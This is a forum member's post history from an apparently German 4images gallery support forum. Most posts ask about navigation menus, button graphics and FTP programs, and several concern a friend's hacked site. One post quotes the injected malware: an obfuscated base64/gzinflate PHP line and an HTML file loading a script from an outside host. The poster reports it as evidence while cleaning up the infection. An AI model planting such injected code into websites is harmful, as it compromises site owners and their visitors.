Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - musicsurfer

Pages: [1] 2 3 4 5 ... 13
1
Wow
Ich bin beeindruckt  8O

Kannst du mir denn ein FTP-Progrmam empfehlen, welches die Passswörter nicht speichert ?
Von Filezilla bin ich auf jeden Fall weg und bei FlashFTP bekomme ich die gespeicherten Passwörter nicht weg.
Welches würdest du denn empfehlen ?

Gruss
Musicsurfer

2
Hi Rembrandt,
WordpRess habe ich nicht auf dem Server.
Und wenn ich die URL bei Google eingebe erscheinen jetzt zumindest keine ungewöhnlichen Suchergebnisse.

Gruss
Musicsurfer

3
Also ich habe mein Filezilla jetzt gegen SmartFTP eingetauscht.
Oder hast du eine Empfehlung für mich, welches FTP-Programm man nutzen kann ?

Das Änderungsdatum der Files ist komischerweise zu der Zeit, wenn der Server das tägliche Backup macht ....
Allerdings war die Änderung am 23.3., und danach waren ja noch 2-3 tägliche Backups.
Egal, ich habe mein FTP-Programm jetzt getauscht und mein System gescannt.

Gruss
Musicsurfer

4
Hi Rembarndt,
heißt das das jemand anderes die Files hochgeladen hat oder ich als ich das FTP-Programm gestartet habe ?

GRuss

5
Hallo,

sein (und mein PC) wurde mit Malwarebytes getestet und ohne Fehler.

Bei dem Server waren die Footer, Header und indexes um folgendes ergänzt:
Code: [Select]
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

Ebenso befanden sich in einigen Ordnern index-Files, die dort nicht hingehören.
Eines habe ich mir mal angesehen:
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->

<TITLE></TITLE>
<META http-equiv=Refresh Content="0; Url=../../">
</HEAD>
</HTML>

FTP-Passwörter wurden geändert.

Gruss
Musicsurfer

6
Hi rembrandt,
da es sich nicht um meine Seite handelt, habe ich die URL nur per PN weitergegeben.
Sorry, das hätte ich dabeischreiben sollen.
Ich habe in der Zwischezit die gesicherten PHP-Dateien wieder auf den Server gespielt und nun geht es wieder.
In fast allen Ordnern waren HEADER und FOOTER, sowie INDEX-Dateien verändert :(

Gruss
Musicsurfer

7
Hallo zusammen,
ein Freund von mir nutzt das 4images für seine Seite.
Und dieses schon 2-3 Jahre.
Nun bekommt er plötzlich an seinem PC mit GData folgende Meldung:

Website gesperrt!
G Data InternetSecurity 2012 hat den Zugriff auf diese Webseite verweigert.
Die Seite enthält infizierten Code: HTML:Script-inf (Engine B).

Von anderen PCs (es wurden 4 getestet) ist ein Zugriff auf die Seite möglich.
Kann es sein das die Seite gehackt wurde udn wie kann er das feststellen ?
Bin für jede Hilfe dankbar.

Gruss
Musicsurfer

8
das schaue ich mir mal an
Danke !

9
Hallo Benny

danke für die wirklich gute Beschreibung.
Aber 1-2 Fragen habe ich noch zur 2. Variante.
Was muss ich denn machen (ich denke mal irgendwa bei Java eingeben) damit ich diesen Mouseover-Effekt habe, dass sich die Schriftfarbe ändert oder besser noch wie auf der gefundenen Seite so ein 'Spotlight' entsteht ?

Gruss Musicsurfer

10
Hallo zusammen

nachdem ich mir das slicen jetzt mal angesehen habe, habe ich aber noch eine kurze Frage.
Mit dem CSS-Menü bin ich ja soweit schon zufrieben, aber ich möchte die einzelnen Punkte nicht als Text sondern als Grafik-Buttons haben.
Die Seite selber aus dem Beispiel ist erstmal nebensächlich, mir kommt es da nur auf die paar Buttons an.
Muss ich sowas auch slicen ?
Oder gibt es da noch andere Möglichkeiten ?

Gruss
Musicsurfer

11
Denke Benny
Den Begrfiff slicen habe ich jetzt zum ersten Mal gehört und muss mich damit erstmal beschäftigen

Gruss

12
Hallo

ich habe mich damit mal beschäftigt und auch ein Tool geladen.
Damit kann ich aber leider nur Textmenüs machen
Was aber auch schon nicht so schlecht ist
Leider sind dort nur die Standardschriftarten vorhanden, so das das gewisse Etwas doch fehlt

Gruss

13
Templates & Styles (Requests & Discussions) / Frage zur Navigation
« on: June 11, 2009, 06:31:36 PM »
Hallo

ich habe eine Siete gefunden, die auch das 4images nutzt
http://www.günters-foto.de/
Die Frage die ich habe, wie bekomme ich so eine Navigation hin (Start...Gästebuch...)

Gruss
Musicsurfer

14
Discussion & Troubleshooting / Re: Adresszeile soll sich nicht mitändern
« on: September 29, 2008, 07:49:32 PM »
Danke für die Antwort !

Gruss
Musicsurfer

15
Discussion & Troubleshooting / Adresszeile soll sich nicht mitändern
« on: September 28, 2008, 09:56:35 PM »
Hallo

kann man das irgendwie hinbekommen, daß bei einem klick im 4images die Serveradresse sich in der Adressleiste nicht mitändert ?
Sondern diese soll immer auf www.homepage.de stehen beliebn und sich nicht mitändern in z.B. www.homepage.de/galerie/bild1.jpg

Gruss
Musicsurfer

Pages: [1] 2 3 4 5 ... 13